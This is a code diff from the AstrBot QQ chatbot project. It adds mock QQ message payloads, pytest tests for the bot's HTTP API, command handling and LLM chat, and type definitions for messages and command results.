|
||||
import botpy.message
|
||||
|
||||
class MockQQOfficialMessage():
|
||||
def __init__(self):
|
||||
# 这些数据已经经过去敏处理
|
||||
self.group_plain_text_sample = {'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': 'just reply me `ok`', 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T19:58:52+08:00'}
|
||||
self.group_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'size': 1440173, 'url': 'https://multimedia.nt.qq.com.cn/download?appid=1407&fileid=Cgk5MDU2MTc5OTISFBvbdDR6nYEHsqWEfYauN9wphLxlGK3zVyD_Cii9ibiql8eHA1CAvaMB&rkey=CAESKE4_cASDm1t162vI7q9gitU2u0SUciVRg1fbyn3zYe9f_XHL2vhiB0s&spec=0', 'width': 1186}], 'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': ' ', 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T20:06:32+08:00'}
|
||||
self.group_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'size': 1440173, 'url': 'https://multimedia.nt.qq.com.cn/download?appid=1407&fileid=Cgk5MDU2MTc5OTISFBvbdDR6nYEHsqWEfYauN9wphLxlGK3zVyD_CiiMytyomceHA1CAvaMB&rkey=CAQSKDOc_jvbthUjVk7zSzPCqflD2XWA0OWzO5qCNsiRFY4RfQMuHYt8KDU&spec=0', 'width': 1186}], 'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': " What's this", 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T20:15:24+08:00'}
|
||||
self.group_event_id_sample = "GROUP_AT_MESSAGE_CREATE:ss6hqvpgtqv99eglilbjpsdzvudsjev64th8srgofxqkgxwpynhysl6q6ws849"
|
||||
|
||||
self.guild_plain_text_sample = {'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': '<@!2519660939131724751> just reply me `ok`', 'guild_id': '7969749791337194879', 'id': '08ffca96ebdaa68fcd6e108de3de0438ef0e48a6c793b506', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=OUbv2LTECcjQt48ibDS4OcA&kti=ZqTjpgAAAAI&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1903, 'seq_in_channel': '1903', 'timestamp': '2024-07-27T20:10:14+08:00'}
|
||||
self.guild_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2665728996', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/75802001660367636/9941389-2665728996-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': '<@!2519660939131724751> ', 'guild_id': '7969749791337194879', 'id': 'testid', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=mZ2Hn0BN5MLlBJTve0WIoA&kti=ZqTjnwAAAAA&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1905, 'seq_in_channel': '1905', 'timestamp': '2024-07-27T20:11:07+08:00'}
|
||||
self.guild_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2501183002', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/75802001660367636/9941389-2501183002-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': "<@!2519660939131724751> What's this", 'guild_id': '7969749791337194879', 'id': 'testid', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=mZ2Hn0BN5MLlBJTve0WIoA&kti=ZqTjnwAAAAA&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1907, 'seq_in_channel': '1907', 'timestamp': '2024-07-27T20:14:26+08:00'}
|
||||
self.guild_event_id_sample = "AT_MESSAGE_CREATE:e4c09708-781d-44d0-b8cf-34bf3d4e2e64"
|
||||
|
||||
self.direct_plain_text_sample = {'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'content': 'just reply me `ok`', 'direct_message': True, 'guild_id': '3398240095091349322', 'id': '08caaea38bcaabbe942f10afaf8fb08fa49d3b38a5014898c893b506', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 165, 'seq_in_channel': '165', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:12:08+08:00'}
|
||||
self.direct_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2658044992', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/92265551678707631/33342831678707631-2658044992-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'direct_message': True, 'guild_id': '3398240095091349322', 'id': 'testid', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 167, 'seq_in_channel': '167', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:12:29+08:00'}
|
||||
self.direct_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'id': '2526212938', 'size': 1440173, 'url': 'gchat.qpic.cn/qmeetpic/92265551678707631/33342831678707631-2526212938-165FCBF8BD6F42496B58A6C66C5D4255/0', 'width': 1186}], 'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '33342831678707631', 'content': "What's this", 'direct_message': True, 'guild_id': '3398240095091349322', 'id': 'testid', 'member': {'joined_at': '2023-03-13T19:40:31+08:00'}, 'seq': 168, 'seq_in_channel': '168', 'src_guild_id': '7969749791337194879', 'timestamp': '2024-07-27T20:13:38+08:00'}
|
||||
self.direct_event_id_sample = "DIRECT_MESSAGE_CREATE:e4c09708-781d-44d0-b8cf-34bf3d4e2e64"
|
||||
|
||||
def create_random_group_message(self):
|
||||
mocked = botpy.message.GroupMessage(
|
||||
api=None,
|
||||
event_id=self.group_event_id_sample,
|
||||
data=self.group_plain_text_sample
|
||||
)
|
||||
return mocked
|
||||
|
||||
def create_random_guild_message(self):
|
||||
mocked = botpy.message.Message(
|
||||
api=None,
|
||||
event_id=self.guild_event_id_sample,
|
||||
data=self.guild_plain_text_sample
|
||||
)
|
||||
return mocked
|
||||
|
||||
def create_random_direct_message(self):
|
||||
mocked = botpy.message.DirectMessage(
|
||||
api=None,
|
||||
event_id=self.direct_event_id_sample,
|
||||
data=self.direct_plain_text_sample
|
||||
)
|
||||
return mocked
|
||||
|
||||
def create_msg(self, text: str):
|
||||
sample = self.group_plain_text_sample.copy()
|
||||
sample['content'] = text
|
||||
mocked = botpy.message.Message(
|
||||
api=None,
|
||||
event_id=self.group_event_id_sample,
|
||||
data=sample
|
||||
)
|
||||
return mocked
|
||||
|
||||
51
tests/test_http_server.py
Normal file
@@ -0,0 +1,51 @@
|
||||
|
||||
import aiohttp
|
||||
import pytest
|
||||
|
||||
BASE_URL = "http://0.0.0.0:6185/api"
|
||||
|
||||
async def get_url(url):
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(url) as response:
|
||||
return await response.json()
|
||||
|
||||
async def post_url(url, data):
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.post(url, json=data) as response:
|
||||
return await response.json()
|
||||
|
||||
class TestHTTPServer:
|
||||
@pytest.mark.asyncio
|
||||
async def test_config(self):
|
||||
configs = await get_url(f"{BASE_URL}/configs")
|
||||
assert 'data' in configs and 'metadata' in configs['data'] \
|
||||
and 'config' in configs['data']
|
||||
config = configs['data']['config']
|
||||
# test post config
|
||||
await post_url(f"{BASE_URL}/astrbot-configs", config)
|
||||
# text post config with invalid data
|
||||
assert 'rate_limit' in config['platform_settings']
|
||||
config['platform_settings']['rate_limit'] = "invalid"
|
||||
ret = await post_url(f"{BASE_URL}/astrbot-configs", config)
|
||||
assert 'status' in ret and ret['status'] == 'error'
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_update(self):
|
||||
await get_url(f"{BASE_URL}/check_update")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_plugins(self):
|
||||
pname = "astrbot_plugin_bilibili"
|
||||
url = f"https://github.com/Soulter/{pname}"
|
||||
|
||||
await get_url(f"{BASE_URL}/extensions")
|
||||
|
||||
# test install plugin
|
||||
await post_url(f"{BASE_URL}/extensions/install", {
|
||||
"url": url
|
||||
})
|
||||
|
||||
# test uninstall plugin
|
||||
await post_url(f"{BASE_URL}/extensions/uninstall", {
|
||||
"name": pname
|
||||
})
|
||||
160
tests/test_message.py
Normal file
@@ -0,0 +1,160 @@
|
||||
import asyncio
|
||||
import pytest
|
||||
import os
|
||||
|
||||
from tests.mocks.qq_official import MockQQOfficialMessage
|
||||
from tests.mocks.onebot import MockOneBotMessage
|
||||
|
||||
from astrbot.bootstrap import AstrBotBootstrap
|
||||
from model.platform.qq_official import QQOfficial
|
||||
from model.platform.qq_aiocqhttp import AIOCQHTTP
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Formatter
|
||||
|
||||
from util.cmd_config import QQOfficialPlatformConfig, AiocqhttpPlatformConfig
|
||||
|
||||
logger = LogManager.GetLogger(
|
||||
log_name='astrbot',
|
||||
out_to_console=True,
|
||||
custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
|
||||
)
|
||||
pytest_plugins = ('pytest_asyncio',)
|
||||
|
||||
os.environ['TEST_MODE'] = 'on'
|
||||
bootstrap = AstrBotBootstrap()
|
||||
|
||||
llm_config = bootstrap.context.config_helper.llm[0]
|
||||
llm_config.api_base = os.environ['OPENAI_API_BASE']
|
||||
llm_config.key = [os.environ['OPENAI_API_KEY']]
|
||||
llm_config.model_config.model = os.environ['LLM_MODEL']
|
||||
llm_config.model_config.max_tokens = 1000
|
||||
llm_provider = ProviderOpenAIOfficial(llm_config)
|
||||
asyncio.run(bootstrap.run())
|
||||
bootstrap.message_handler.provider = llm_provider
|
||||
bootstrap.config_helper.wake_prefix = ["/"]
|
||||
bootstrap.config_helper.admins_id = ["905617992"]
|
||||
|
||||
for p_config in bootstrap.context.config_helper.platform:
|
||||
if isinstance(p_config, QQOfficialPlatformConfig):
|
||||
qq_official = QQOfficial(bootstrap.context, bootstrap.message_handler, p_config)
|
||||
elif isinstance(p_config, AiocqhttpPlatformConfig):
|
||||
aiocqhttp = AIOCQHTTP(bootstrap.context, bootstrap.message_handler, p_config)
|
||||
|
||||
class TestBasicMessageHandle():
|
||||
@pytest.mark.asyncio
|
||||
async def test_qqofficial_group_message(self):
|
||||
group_message = MockQQOfficialMessage().create_random_group_message()
|
||||
abm = qq_official._parse_from_qqofficial(group_message, MessageType.GROUP_MESSAGE)
|
||||
ret = await qq_official.handle_msg(abm)
|
||||
print(ret)
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_qqofficial_guild_message(self):
|
||||
guild_message = MockQQOfficialMessage().create_random_guild_message()
|
||||
abm = qq_official._parse_from_qqofficial(guild_message, MessageType.GUILD_MESSAGE)
|
||||
ret = await qq_official.handle_msg(abm)
|
||||
print(ret)
|
||||
|
||||
# 有共同性,为了节约开销,不测试频道私聊。
|
||||
# @pytest.mark.asyncio
|
||||
# async def test_qqofficial_private_message(self):
|
||||
# private_message = MockQQOfficialMessage().create_random_direct_message()
|
||||
# abm = qq_official._parse_from_qqofficial(private_message, MessageType.FRIEND_MESSAGE)
|
||||
# ret = await qq_official.handle_msg(abm)
|
||||
# print(ret)
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_aiocqhttp_group_message(self):
|
||||
event = MockOneBotMessage().create_random_group_message()
|
||||
abm = aiocqhttp.convert_message(event)
|
||||
ret = await aiocqhttp.handle_msg(abm)
|
||||
print(ret)
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_aiocqhttp_direct_message(self):
|
||||
event = MockOneBotMessage().create_random_direct_message()
|
||||
abm = aiocqhttp.convert_message(event)
|
||||
ret = await aiocqhttp.handle_msg(abm)
|
||||
print(ret)
|
||||
|
||||
class TestInteralCommandHsandle():
|
||||
def create(self, text: str):
|
||||
event = MockOneBotMessage().create_msg(text)
|
||||
abm = aiocqhttp.convert_message(event)
|
||||
return abm
|
||||
|
||||
async def fast_test(self, text: str):
|
||||
abm = self.create(text)
|
||||
ret = await aiocqhttp.handle_msg(abm)
|
||||
print(f"Command: {text}, Result: {ret.result_message}")
|
||||
return ret
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_config_save(self):
|
||||
abm = self.create("/websearch on")
|
||||
ret = await aiocqhttp.handle_msg(abm)
|
||||
assert bootstrap.context.config_helper.llm_settings.web_search \
|
||||
== bootstrap.config_helper.get("llm_settings")['web_search']
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_websearch(self):
|
||||
await self.fast_test("/websearch")
|
||||
await self.fast_test("/websearch on")
|
||||
await self.fast_test("/websearch off")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_help(self):
|
||||
await self.fast_test("/help")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_myid(self):
|
||||
await self.fast_test("/myid")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_wake(self):
|
||||
await self.fast_test("/wake")
|
||||
await self.fast_test("/wake #")
|
||||
assert "#" in bootstrap.context.config_helper.wake_prefix
|
||||
assert "#" in bootstrap.context.config_helper.get("wake_prefix")
|
||||
await self.fast_test("#wake /")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sleep(self):
|
||||
await self.fast_test("/provider")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_update(self):
|
||||
await self.fast_test("/update")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_t2i(self):
|
||||
if not bootstrap.context.config_helper.t2i:
|
||||
abm = self.create("/t2i")
|
||||
await aiocqhttp.handle_msg(abm)
|
||||
await self.fast_test("/help")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_plugin(self):
|
||||
pname = "astrbot_plugin_bilibili"
|
||||
url = f"https://github.com/Soulter/{pname}"
|
||||
await self.fast_test("/plugin")
|
||||
await self.fast_test(f"/plugin l")
|
||||
await self.fast_test(f"/plugin i {url}")
|
||||
await self.fast_test(f"/plugin u {url}")
|
||||
await self.fast_test(f"/plugin d {pname}")
|
||||
|
||||
class TestLLMChat():
|
||||
@pytest.mark.asyncio
|
||||
async def test_llm_chat(self):
|
||||
os.environ["TEST_LLM"] = "on"
|
||||
ret = await llm_provider.text_chat("Just reply `ok`", "test")
|
||||
print(ret)
|
||||
event = MockOneBotMessage().create_msg("Just reply `ok`")
|
||||
abm = aiocqhttp.convert_message(event)
|
||||
ret = await aiocqhttp.handle_msg(abm)
|
||||
print(ret)
|
||||
os.environ["TEST_LLM"] = "off"
|
||||
|
||||
37
type/astrbot_message.py
Normal file
@@ -0,0 +1,37 @@
|
||||
import time
|
||||
from enum import Enum
|
||||
from typing import List
|
||||
from dataclasses import dataclass
|
||||
from nakuru.entities.components import BaseMessageComponent
|
||||
|
||||
class MessageType(Enum):
|
||||
GROUP_MESSAGE = 'GroupMessage' # 群组形式的消息
|
||||
FRIEND_MESSAGE = 'FriendMessage' # 私聊、好友等单聊消息
|
||||
GUILD_MESSAGE = 'GuildMessage' # 频道消息
|
||||
|
||||
@dataclass
|
||||
class MessageMember():
|
||||
user_id: str # 发送者id
|
||||
nickname: str = None
|
||||
|
||||
|
||||
class AstrBotMessage():
|
||||
'''
|
||||
AstrBot 的消息对象
|
||||
'''
|
||||
tag: str # 消息来源标签
|
||||
type: MessageType # 消息类型
|
||||
self_id: str # 机器人的识别id
|
||||
session_id: str # 会话id
|
||||
message_id: str # 消息id
|
||||
sender: MessageMember # 发送者
|
||||
message: List[BaseMessageComponent] # 消息链使用 Nakuru 的消息链格式
|
||||
message_str: str # 最直观的纯文本消息字符串
|
||||
raw_message: object
|
||||
timestamp: int # 消息时间戳
|
||||
|
||||
def __init__(self) -> None:
|
||||
self.timestamp = int(time.time())
|
||||
|
||||
def __str__(self) -> str:
|
||||
return str(self.__dict__)
|
||||
78
type/command.py
Normal file
@@ -0,0 +1,78 @@
|
||||
from typing import Union, List, Callable
|
||||
from dataclasses import dataclass
|
||||
from nakuru.entities.components import Plain, Image
|
||||
|
||||
@dataclass
|
||||
class CommandItem():
|
||||
'''
|
||||
用来描述单个指令
|
||||
'''
|
||||
|
||||
command_name: Union[str, tuple] # 指令名
|
||||
callback: Callable # 回调函数
|
||||
description: str # 描述
|
||||
origin: str # 注册来源
|
||||
|
||||
class CommandResult():
|
||||
'''
|
||||
用于在Command中返回多个值
|
||||
'''
|
||||
|
||||
def __init__(self,
|
||||
hit: bool = True,
|
||||
success: bool = True,
|
||||
message_chain: list = [],
|
||||
command_name: str = "unknown_command",
|
||||
use_t2i: bool = None) -> None:
|
||||
self.hit = hit
|
||||
self.success = success
|
||||
self.message_chain = message_chain
|
||||
self.command_name = command_name
|
||||
self.is_use_t2i = use_t2i
|
||||
|
||||
def message(self, message: str):
|
||||
'''
|
||||
快捷回复消息。
|
||||
|
||||
CommandResult().message("Hello, world!")
|
||||
'''
|
||||
self.message_chain = [Plain(message), ]
|
||||
return self
|
||||
|
||||
def error(self, message: str):
|
||||
'''
|
||||
快捷回复消息。
|
||||
|
||||
CommandResult().error("Hello, world!")
|
||||
'''
|
||||
self.success = False
|
||||
self.message_chain = [Plain(message), ]
|
||||
return self
|
||||
|
||||
def url_image(self, url: str):
|
||||
'''
|
||||
快捷回复图片(网络url的格式)。
|
||||
|
||||
CommandResult().image("https://example.com/image.jpg")
|
||||
'''
|
||||
self.message_chain = [Image.fromURL(url), ]
|
||||
return self
|
||||
|
||||
def file_image(self, path: str):
|
||||
'''
|
||||
快捷回复图片(本地文件路径的格式)。
|
||||
|
||||
CommandResult().image("image.jpg")
|
||||
'''
|
||||
self.message_chain = [Image.fromFileSystem(path), ]
|
||||
return self
|
||||
|
||||
def use_t2i(self, use_t2i: bool):
|
||||
'''
|
||||
设置是否使用文本转图片服务。如果不设置,则跟随用户的设置。
|
||||
'''
|
||||
self.is_use_t2i = use_t2i
|
||||
return self
|
||||
|
||||
def _result_tuple(self):
|
||||
return (self.success, self.message_chain, self.command_name)
|
||||